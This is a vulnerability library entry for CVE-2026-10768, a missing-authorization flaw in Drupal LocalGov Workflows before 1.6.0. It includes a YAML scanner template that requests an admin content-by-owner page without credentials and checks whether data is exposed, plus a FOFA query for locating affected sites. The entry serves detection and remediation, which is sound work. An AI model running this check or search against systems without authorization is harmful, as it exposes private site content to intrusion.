/Vulnerability Library

Drupal LocalGov Workflows < 1.6.0 - Information Disclosure

CVE-2026-10768
Early Release

Description

Drupal LocalGov Workflows < 1.6.0 contains a broken access control vulnerability caused by missing authorization checks, letting attackers perform forceful browsing to access unauthorized resources, exploit requires no special privileges.

Severity

High

CVSS Score

7.5

Exploit Probability

0%

Affected Product

localgov_workflows

Published Date

August 11, 2026

Template Author

str4k3r

CVE-2026-10768.yaml
id: CVE-2026-10768

info:
  name: Drupal LocalGov Workflows < 1.6.0 - Information Disclosure
  author: str4k3r
  severity: high
  description: |
    Drupal LocalGov Workflows < 1.6.0 contains a broken access control vulnerability caused by missing authorization checks, letting attackers perform forceful browsing to access unauthorized resources, exploit requires no special privileges.
  impact: |
    Attackers can access unauthorized resources, potentially exposing sensitive data or functionality.
  remediation: |
    Update to a version later than 1.6.0 or the latest available version.
  reference:
    - https://www.drupal.org/sa-contrib-2026-039
    - https://www.drupal.org/project/localgov_workflows/releases/1.6.0
    - https://nvd.nist.gov/vuln/detail/CVE-2026-10768
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-10768
    epss-score: 0.00331
    epss-percentile: 0.25862
    cwe-id: CWE-862
  metadata:
    verified: true
    max-request: 1
    vendor: drupal
    product: localgov_workflows
    framework: drupal
    fofa-query: 'body="/modules/contrib/localgov"'
  tags: cve,cve2026,drupal,localgov,exposure

http:
  - raw:
      - |
        GET /admin/content/localgov-service-contact/content-by-owner HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, 'views-field-title', 'views-field-user', 'views-field-status')"
          - "contains(body, 'view-id-localgov_content_by_owner')"
          - "!contains(body, 'views-empty')"
          - "status_code == 200"
        condition: and
7.5Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2026-10768
CWE ID:
cwe-862

References

https://www.drupal.org/sa-contrib-2026-039https://www.drupal.org/project/localgov_workflows/releases/1.6.0https://nvd.nist.gov/vuln/detail/CVE-2026-10768

Remediation Steps

Update to a version later than 1.6.0 or the latest available version.